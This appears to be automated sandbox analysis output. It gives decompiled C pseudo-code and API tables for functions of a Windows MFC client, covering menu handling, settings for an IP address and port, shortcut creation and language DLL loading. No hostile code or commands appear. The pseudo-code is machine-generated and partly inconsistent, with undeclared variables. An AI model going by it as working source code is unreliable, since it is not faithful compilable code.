Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297$#2414#5787$#1641CreateH_prolog
String ID: DB
API String ID: 4254424135-3807777182
Opcode ID: 4cb1e91095c86a8ecac19592b01f9b0dac6d76583eab8f53c3b5a3f90e888455
Instruction ID: b341c6af23c9f6574c41496bb8b667be2c3c34b0294befac143a6d5a63c9a06a
Opcode Fuzzy Hash: 4cb1e91095c86a8ecac19592b01f9b0dac6d76583eab8f53c3b5a3f90e888455
Instruction Fuzzy Hash: 58513F71A0011AABCB04DF95D995DEFB7ADEF48308B41442FF416A3241DB78EE19CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004165E9, Relevance: 37.7, APIs: 25, Instructions: 192
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004165E9(void* __ecx) {
				void* _t67;
				void* _t70;
				struct HMENU__* _t84;
				void* _t92;
				signed char _t95;
				signed char _t97;
				void* _t111;
				void* _t112;
				void* _t115;
				intOrPtr* _t123;
				intOrPtr _t124;
				int _t126;
				CHAR* _t128;
				void* _t130;
				void* _t133;
				void* _t135;
				intOrPtr _t136;

				L004269E6();
				_t136 = _t135 - 0x28;
				_t130 = __ecx;
				L0042650A();
				 *((intOrPtr*)(_t133 - 0x34)) = 0x42e4fc;
				_t126 = 0;
				 *(_t133 - 4) = 0;
				L00425E08();
				 *(_t133 - 4) = 1;
				_t67 =  *((intOrPtr*)(__ecx + 0x10)) - 1;
				 *(_t133 - 0x18) = 0;
				if(_t67 < 0) {
					L3:
					 *(_t133 - 0x10) = _t126;
					if(GetMenuItemCount( *(_t130 + 4)) <= _t126) {
						L24:
						E00401F19(_t130);
						_push(0xffffffff);
						_push(_t126);
						L00426588();
						_t70 = _t133 - 0x34;
						_push(_t70);
						L004266F6();
						_push(0xffffffff);
						_push(_t126);
						L00426588();
						 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
						L00425DFC();
						 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
						L00426504();
						 *[fs:0x0] =  *((intOrPtr*)(_t133 - 0xc));
						return _t70;
					}
					while(1) {
						_t95 = GetMenuState( *(_t130 + 4),  *(_t133 - 0x10), 0x400);
						if((_t95 & 0x00000010) == 0) {
							goto L11;
						}
						_t84 = GetSubMenu( *(_t130 + 4),  *(_t133 - 0x10));
						_push(_t84);
						L0042635A();
						 *((intOrPtr*)(_t133 - 0x1c)) =  *((intOrPtr*)(_t84 + 4));
						_t128 = E004015F0(_t130,  *((intOrPtr*)(_t84 + 4)));
						_push(0x400);
						L0042601E();
						GetMenuStringA( *(_t130 + 4),  *(_t133 - 0x10), 0x100, 0x100, 0x100);
						_push(0xffffffff);
						_t115 = _t133 - 0x14;
						L00426018();
						if(_t128 != 0) {
							_t89 =  *((intOrPtr*)(_t133 - 0x14));
							if( *((intOrPtr*)( *((intOrPtr*)(_t133 - 0x14)) - 8)) > 0) {
								L00402117(_t128, _t89);
							}
							L20:
							if(_t128 != 0) {
								_push(_t128);
								_push( *((intOrPtr*)(_t133 - 0x2c)));
								L00426582();
							}
							 *(_t133 - 0x10) =  *(_t133 - 0x10) + 1;
							if( *(_t133 - 0x10) < GetMenuItemCount( *(_t130 + 4))) {
								_t126 = 0;
								continue;
							} else {
								_t126 = 0;
								goto L24;
							}
						}
						_push(_t115);
						 *((intOrPtr*)(_t133 - 0x20)) = _t136;
						_push(_t133 - 0x14);
						L0042611A();
						_push( *((intOrPtr*)(_t133 - 0x1c)));
						_t97 = _t95 & 0x000000ef | 0x00000510;
						L14:
						_push(_t97);
						_push( *(_t133 - 0x10));
						_t128 = E0040198D(_t130);
						goto L20;
						L11:
						if((_t95 & 0x00000008) == 0) {
							 *(_t133 - 0x18) = GetMenuItemID( *(_t130 + 4),  *(_t133 - 0x10));
							_t128 = E004015F0(_t130, _t72);
							_push(0x400);
							L0042601E();
							GetMenuStringA( *(_t130 + 4),  *(_t133 - 0x10), 0x100, 0x100, 0x100);
							_push(0xffffffff);
							_t111 = _t133 - 0x14;
							L00426018();
							if(_t128 != 0) {
								_t128[0x10] = _t95 | 0x00000005;
								_t76 =  *((intOrPtr*)(_t133 - 0x14));
								if( *((intOrPtr*)( *((intOrPtr*)(_t133 - 0x14)) - 8)) > 0) {
									L00402117(_t128, _t76);
								}
								L19:
								ModifyMenuA( *(_t130 + 4),  *(_t133 - 0x10), _t128[0x10],  *(_t133 - 0x18), _t128);
								goto L20;
							}
							_push(_t111);
							 *((intOrPtr*)(_t133 - 0x20)) = _t136;
							_push(_t133 - 0x14);
							L0042611A();
							_push( *(_t133 - 0x18));
							_t97 = _t95 | 0x00000005;
							goto L14;
						}
						_t112 = _t130;
						_t128 = E004015F0(_t112, _t126);
						if(_t128 != 0) {
							goto L19;
						}
						_push(_t112);
						 *((intOrPtr*)(_t133 - 0x20)) = _t136;
						_push(0x4421f8);
						L00425FB8();
						_push(_t128);
						_t97 = _t95 | 0x0000000d;
						goto L14;
					}
				} else {
					_t123 =  *((intOrPtr*)(__ecx + 0xc));
					_t92 = _t67 + 1;
					do {
						_t124 =  *_t123;
						_t123 = _t123 + 4;
						_t92 = _t92 - 1;
						 *((intOrPtr*)(_t124 + 0x18)) = 0;
					} while (_t92 != 0);
					goto L3;
				}
			}

APIs

_EH_prolog.MSVCRT ref: 004165EE
#500.MFC42 ref: 004165FE
#540.MFC42 ref: 00416612
GetMenuItemCount.USER32 ref: 0041663B
GetMenuState.USER32 ref: 00416658
GetSubMenu.USER32 ref: 0041666F
#2863.MFC42(00000000), ref: 00416676
#2915.MFC42(00000100,00000100,00000400,00000000), ref: 0041669A
GetMenuStringA.USER32(00000001,00000000,00000000,00000100,00000100), ref: 004166A6
#5572.MFC42(000000FF), ref: 004166B1
#535.MFC42(?,?,000000FF), ref: 004166C4
#537.MFC42(004421F8), ref: 00416715
GetMenuItemID.USER32(00000001,?), ref: 00416736
#2915.MFC42(00000100,00000100,00000400), ref: 00416758
GetMenuStringA.USER32(00000001,?,00000000,00000100,00000100), ref: 00416764
#5572.MFC42(000000FF), ref: 0041676F
#535.MFC42(?,?,000000FF), ref: 00416782
ModifyMenuA.USER32(00000001,?,?,?,00000000), ref: 004167B4
#5860.MFC42(?,00000000,?,000000FF), ref: 004167C5
GetMenuItemCount.USER32 ref: 004167D0
#6142.MFC42(00000000,000000FF), ref: 004167F0
#1621.MFC42(0042E4FC,00000000,000000FF), ref: 004167FB
#6142.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 00416806
#800.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 00416812
#772.MFC42(00000000,000000FF,0042E4FC,00000000,000000FF), ref: 0041681E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$#2915#535#5572#6142CountString$#1621#2863#500#537#540#5860#772#800H_prologModifyState
String ID:
API String ID: 1688199935-0
Opcode ID: 16c03e19aa8acc6173eee3f604f3b274446e5f42d4e7634a22419511f426bca1
Instruction ID: 41e20e616bb2e9df9e81541e086d70c4f2de00b0a43771748c3f596175697331
Opcode Fuzzy Hash: 16c03e19aa8acc6173eee3f604f3b274446e5f42d4e7634a22419511f426bca1
Instruction Fuzzy Hash: 7961D171A00114ABCB01EB95DE46AEEBBB6FF84304F11051EF426B32E1DB389940DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401096, Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00401096(void* __ecx) {
				void* _t25;
				void* _t40;
				void* _t42;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t40 = __ecx;
				L00426252();
				SendMessageA( *(__ecx + 0xb0), 0x466, 0, _t42 - 0x14);
				_push( *(_t42 - 0x14));
				_push("IPAdress");
				_push("Settings");
				L0042624C();
				_push(SendMessageA( *(_t40 + 0x130), 0x468, 0, 0));
				_push("PortNumber");
				_push("Settings");
				L0042624C();
				L00425E08();
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_push(_t42 - 0x10);
				L00426246();
				_push( *((intOrPtr*)(_t42 - 0x10)));
				_push("SignInName");
				_push("Settings");
				L00426240();
				_t25 = L00402077(_t40 + 0x1d0);
				_push(_t25);
				_push("SignIndex");
				_push("Settings");
				L0042624C();
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t25;
			}

APIs

_EH_prolog.MSVCRT ref: 0040BCA2
#4497.MFC42 ref: 0040BCAD
SendMessageA.USER32 ref: 0040BCC9
#6402.MFC42(Settings,IPAdress,?), ref: 0040BCDE
SendMessageA.USER32 ref: 0040BCF2
#6402.MFC42(Settings,PortNumber,00000000), ref: 0040BD05
#540.MFC42(Settings,PortNumber,00000000), ref: 0040BD0D
#3874.MFC42(?,Settings,PortNumber,00000000), ref: 0040BD20
#6403.MFC42(Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD38
#6402.MFC42(Settings,SignIndex,00000000,Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD59
#800.MFC42(Settings,SignIndex,00000000,Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD65

Strings

Settings, xrefs: 0040BD33
PortNumber, xrefs: 0040BCFB
Settings, xrefs: 0040BD00
IPAdress, xrefs: 0040BCD4
SignInName, xrefs: 0040BD2E
Settings, xrefs: 0040BCD9
SignIndex, xrefs: 0040BD4F
Settings, xrefs: 0040BD54

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402$MessageSend$#3874#4497#540#6403#800H_prolog
String ID: IPAdress$PortNumber$Settings$Settings$Settings$Settings$SignInName$SignIndex
API String ID: 2207934601-1017397922
Opcode ID: 8a4ac68a6cd69900ac3f04795bba869b7ca688ad4180bd63adc8af47a20d8952
Instruction ID: 37e8abe2a77004a106e54dbaf6d15eaca24f1c3faa82b1c2894f0630d7c186fb
Opcode Fuzzy Hash: 8a4ac68a6cd69900ac3f04795bba869b7ca688ad4180bd63adc8af47a20d8952
Instruction Fuzzy Hash: 6611AC71750714EAE724FBA1DC42FAEB374AF80704F62441EB666720D1CEB82920CB38

Uniqueness

Uniqueness Score: -1.00%

Function 0040149C, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040149C(void* __ecx, void* __eflags) {
				void* _t50;
				long _t53;
				void* _t57;
				void* _t60;
				void* _t87;
				void* _t88;
				void* _t90;

				L004269E6();
				_t87 = __ecx;
				L00425E08();
				 *(_t90 - 4) = 0;
				L0040227F(_t90 - 0x40);
				 *(_t90 - 4) = 1;
				GetModuleFileNameA(0, _t90 - 0x178, 0x104);
				_t50 = _t90 - 0x178;
				_push(_t50);
				L004261A4();
				_push(0x442184);
				L004261A4();
				_push(0x442188);
				L004261A4();
				_push(0x8085);
				L00425FB8();
				_push(_t50);
				 *(_t90 - 4) = 2;
				L00426054();
				 *(_t90 - 4) = 1;
				L00425DFC();
				_push(_t90 - 0x178);
				L004261A4();
				 *((intOrPtr*)(_t90 - 0x24)) = 0;
				 *((intOrPtr*)(_t90 - 0x20)) = 1;
				if(_t87 != 0) {
					_t88 =  *(_t87 + 0x20);
				} else {
					_t88 = 0;
				}
				_t53 = SHGetSpecialFolderLocation(_t88,  *(_t90 + 0xc), _t90 - 0x18);
				if(_t53 == 0) {
					_t53 = _t90 - 0x27c;
					__imp__SHGetPathFromIDListA( *(_t90 - 0x18), _t53);
				}
				_push(0xe000);
				L00425FB8();
				_push( *_t53);
				 *(_t90 - 4) = 3;
				_push(_t90 - 0x27c);
				_push("%s\\%s.lnk");
				_push(_t90 - 0x10);
				L00425FDC();
				 *(_t90 - 4) = 1;
				L00425DFC();
				_t99 =  *((intOrPtr*)(_t90 + 8));
				if( *((intOrPtr*)(_t90 + 8)) == 0) {
					DeleteFileA( *(_t90 - 0x10));
				} else {
					L00401D02(_t90 - 0x74);
					 *(_t90 - 4) = 4;
					_t60 = E004013F2(_t90 - 0x74, _t99, _t90 - 0x40);
					_t100 = _t60;
					if(_t60 != 0) {
						L00401CF3(_t90 - 0x74, _t100, _t90 - 0x10);
					}
					 *(_t90 - 4) = 1;
					L00401CC6(_t90 - 0x74);
				}
				 *(_t90 - 4) = 0;
				_t57 = L00401889(_t90 - 0x40);
				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t57;
			}

APIs

_EH_prolog.MSVCRT ref: 0040EB8C
#540.MFC42 ref: 0040EB9E
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EBC1
#860.MFC42(?), ref: 0040EBD1
#860.MFC42(00442184,?), ref: 0040EBDE
#860.MFC42(00442188,00442184,?), ref: 0040EBEB
#537.MFC42(00008085,00442188,00442184,?), ref: 0040EBF8
#858.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC05
#800.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC11
#860.MFC42(?,00000000,00008085,00442188,00442184,?), ref: 0040EC20
SHGetSpecialFolderLocation.SHELL32(00000001,?,?,?,00000000,00008085,00442188,00442184,?), ref: 0040EC42
SHGetPathFromIDListA.SHELL32(?,?), ref: 0040EC56
#537.MFC42(0000E000), ref: 0040EC64
#2818.MFC42(?,%s\%s.lnk,0000E000,00000000,0000E000), ref: 0040EC7F
#800.MFC42(?,0000E000), ref: 0040EC8E
DeleteFileA.KERNEL32(?,?,0000E000), ref: 0040ECD1
#800.MFC42(?,0000E000), ref: 0040ECE9

Strings

%s\%s.lnk, xrefs: 0040EC79

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$#800$#537File$#2818#540#858DeleteFolderFromH_prologListLocationModuleNamePathSpecial
String ID: %s\%s.lnk
API String ID: 4211795105-568909016
Opcode ID: 6648758b5d7892323ab5d9a8d16d60c67fc8a9fba416218a1bd3530eb7e6cd2a
Instruction ID: b17b01f2fd3ab37964e5237dfa2d4baf73cd5e6917736e1bd7fc505b84cc0e75
Opcode Fuzzy Hash: 6648758b5d7892323ab5d9a8d16d60c67fc8a9fba416218a1bd3530eb7e6cd2a
Instruction Fuzzy Hash: 4A41AE71904129EEDF10EBA2D986AEDB778BF14308FA0446EE405B31D2DB785B08CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004010A0, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004010A0() {
				struct HDC__* _t35;
				int _t37;
				struct HBITMAP__* _t38;
				void* _t46;
				struct HICON__* _t48;
				int _t52;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				struct HBITMAP__* _t66;
				int _t69;
				void* _t71;

				L004269E6();
				_t69 = 0;
				_t48 = ImageList_GetIcon( *( *((intOrPtr*)(_t71 + 0xc)) + 4),  *(_t71 + 0x10), 0);
				L004264B0();
				_t63 =  *((intOrPtr*)(_t71 + 8));
				 *(_t71 - 4) = 0;
				if(_t63 != 0) {
					_t35 =  *(_t63 + 4);
				} else {
					_t35 = 0;
				}
				_push(CreateCompatibleDC(_t35));
				L004264AA();
				_t37 =  *0x440d0c; // 0xf
				_t52 =  *0x440d08; // 0x10
				_t38 = CreateCompatibleBitmap( *(_t63 + 4), _t52, _t37);
				_t64 =  *((intOrPtr*)(_t71 + 0x14));
				_push(_t38);
				L004264BC();
				if(_t64 != _t69) {
					_t65 =  *((intOrPtr*)(_t64 + 4));
				} else {
					_t65 = 0;
				}
				_push(_t65);
				_push( *(_t71 - 0x20));
				L00426540();
				_t66 = _t38;
				 *(_t71 - 0x10) = _t69;
				 *(_t71 - 0x14) = 0x42e55c;
				 *(_t71 - 4) = 1;
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t17 = _t71 - 0x14; // 0x42e55c
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				DrawIconEx( ~(_t71 - 0x24) &  *(_t71 - 0x20), _t69, _t69, _t48,  *0x440d08,  *0x440d0c, _t69,  ~_t17 &  *(_t71 - 0x10), 3);
				if(_t66 != _t69) {
					_t69 =  *(_t66 + 4);
				}
				_push(_t69);
				_push( *(_t71 - 0x20));
				L00426540();
				L004264A4();
				DestroyIcon(_t48);
				 *(_t71 - 0x14) = 0x42c514;
				 *(_t71 - 4) = 2;
				L00425FA6();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				 *(_t71 - 0x14) = 0x42c4fc;
				L0042649E();
				_t46 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t46;
			}

APIs

_EH_prolog.MSVCRT ref: 004142B4
ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 004142CB
#323.MFC42 ref: 004142D6
CreateCompatibleDC.GDI32(?), ref: 004142ED
#1640.MFC42(00000000), ref: 004142F7
CreateCompatibleBitmap.GDI32(?,00000010,0000000F), ref: 0041430C
#1641.MFC42(00000000), ref: 00414318
#5785.MFC42(?,?,00000000), ref: 0041432C
GetSysColor.USER32(0000000F), ref: 00414343
CreateSolidBrush.GDI32(00000000), ref: 0041434A
#1641.MFC42(00000000), ref: 00414354
DrawIconEx.USER32 ref: 00414381
#5785.MFC42(?,00000000), ref: 00414392
#2405.MFC42(?,00000000), ref: 0041439A
DestroyIcon.USER32(00000000,?,00000000), ref: 004143A0
#2414.MFC42 ref: 004143B4
#640.MFC42 ref: 004143C7

Strings

\B, xrefs: 00414351

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateIcon$#1641#5785Compatible$#1640#2405#2414#323#640BitmapBrushColorDestroyDrawH_prologImageList_Solid
String ID: \B
API String ID: 3094284070-2993081821
Opcode ID: 54f335d49f4542dda4a8dde4196bcd1f1bb727c8c201da0efc40fa9fcd1f847c
Instruction ID: beff783ddb7729a654386445507e2a1b5105f6ed7220b52430e4a91936a833c9
Opcode Fuzzy Hash: 54f335d49f4542dda4a8dde4196bcd1f1bb727c8c201da0efc40fa9fcd1f847c
Instruction Fuzzy Hash: DB319576A00125AFCB11EFE1ED49EEEBB79FF89314B51411AF505A3150CB386E44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004021E9, Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004021E9(void* __ecx) {
				signed short _t18;
				intOrPtr* _t21;
				void* _t31;
				void* _t32;
				void* _t61;
				void* _t63;

				L004269E6();
				_push(__ecx);
				_t61 = __ecx;
				_push(0);
				_push("IPAdress");
				_push("Settings");
				L00425E3E();
				SendMessageA( *(__ecx + 0xb0), 0x465, 0, E00428576);
				_t18 = SendMessageA( *(_t61 + 0x130), 0x46f, 0x5dc, 0xfde8);
				_push(0x5dc);
				_push("PortNumber");
				_push("Settings");
				L00425E3E();
				SendMessageA( *(_t61 + 0x130), 0x467, 0, _t18 & 0x0000ffff);
				_push(0x442164);
				_push("SignInName");
				_t21 = _t63 - 0x10;
				_push("Settings");
				_push(_t21);
				L00426234();
				_push( *_t21);
				 *(_t63 - 4) = 0;
				L00426120();
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				L00425DFC();
				_t58 = _t61 + 0x1d0;
				L00401B13(_t61 + 0x1d0, 0x90);
				L00401B13(_t61 + 0x1d0, 0x91);
				L00401B13(_t58, 0x92);
				L00401B13(_t58, 0x93);
				L00401B13(_t58, 0x94);
				L00401B13(_t58, 0x95);
				L00401B13(_t58, 0x96);
				L00401B13(_t58, 0x97);
				L00401B13(_t58, 0x98);
				_t31 = L00401B13(_t58, 0x99);
				_push(0);
				_push("SignIndex");
				_push("Settings");
				L00425E3E();
				_t32 = L00401C5D(_t58, _t31);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t32;
			}

APIs

_EH_prolog.MSVCRT ref: 0040BB04
#3521.MFC42(Settings,IPAdress,00000000), ref: 0040BB21
SendMessageA.USER32 ref: 0040BB3A
SendMessageA.USER32 ref: 0040BB52
#3521.MFC42(Settings,PortNumber,000005DC), ref: 0040BB65
SendMessageA.USER32 ref: 0040BB7C
#3522.MFC42(?,Settings,SignInName,00442164), ref: 0040BB97
#6199.MFC42(00000000,?,Settings,SignInName,00442164), ref: 0040BBA7
#800.MFC42(00000000,?,Settings,SignInName,00442164), ref: 0040BBB3
#3521.MFC42(Settings,SignIndex,00000000,00000099,00000098,00000097,00000096,00000095,00000094,00000093,00000092,00000091,00000090,00000000,?,Settings), ref: 0040BC47

Strings

SignIndex, xrefs: 0040BC37
PortNumber, xrefs: 0040BB5B
Settings, xrefs: 0040BB91
IPAdress, xrefs: 0040BB11
Settings, xrefs: 0040BB1C
SignInName, xrefs: 0040BB89
Settings, xrefs: 0040BC42
Settings, xrefs: 0040BB60

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521MessageSend$#3522#6199#800H_prolog
String ID: IPAdress$PortNumber$Settings$Settings$Settings$Settings$SignInName$SignIndex
API String ID: 3937295072-1017397922
Opcode ID: 47b717c9f07083bd77ca1f0206805cfaf279bf344fedfd5a52b55af7d6a27b3b
Instruction ID: f7b8febfb108906bb52e0572c16d838be61318258c6e8ffadab950a5f25802e5
Opcode Fuzzy Hash: 47b717c9f07083bd77ca1f0206805cfaf279bf344fedfd5a52b55af7d6a27b3b
Instruction Fuzzy Hash: D5319570340700BAE61577619C53F7E72AAABC0718F41442FB2567B1E3EFB929119719

Uniqueness

Uniqueness Score: -1.00%

Function 004010E1, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 86
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004010E1(void* __ecx, void* __edi) {
				struct HINSTANCE__* _t23;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t46;
				void* _t51;
				void* _t53;

				_t46 = __edi;
				L004269E6();
				_push(__ecx);
				_t51 = __ecx;
				if( *((intOrPtr*)(_t53 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t53 + 8)));
					_push("Language");
					_push("Settings");
					L0042624C();
				}
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					_t23 = LoadLibraryA("CWUCliFr.dll");
				} else {
					FreeLibrary( *0x442170);
					_t23 =  *( *((intOrPtr*)(_t51 + 0x1bc)) + 0xc4);
				}
				 *0x442170 = _t23;
				if(_t23 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0x8072);
					L00425E56();
					_t24 = 1;
					_push(_t24);
					_push("Language");
					_push("Settings");
					 *((intOrPtr*)(_t51 + 0x384)) = _t24;
					L0042624C();
				} else {
					_push(_t46);
					L00425E44();
					 *(_t23 + 0xc) = _t23;
					_t25 = L00401DC0(_t51);
					_push(0xe001);
					L00426384();
					_push(0xe000);
					L00425FB8();
					_push( *_t25);
					 *(_t53 - 4) = 0;
					L00426120();
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L00425DFC();
					_push(0xe000);
					L00425FB8();
					 *(_t53 - 4) = 1;
					L004012EE(_t51,  *_t25);
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L00425DFC();
					_push(0);
					_push(0x8c);
					_t24 = L004013CF(_t51, 0x8d);
					if( *((intOrPtr*)(_t53 + 0xc)) != 0) {
						_t24 = L00401E60(_t51);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t24;
			}

APIs

_EH_prolog.MSVCRT ref: 0040CB60
#6402.MFC42(Settings,Language,?), ref: 0040CB84
FreeLibrary.KERNEL32(Settings,Language,?), ref: 0040CB94
LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CBAD
#1168.MFC42 ref: 0040CBC3
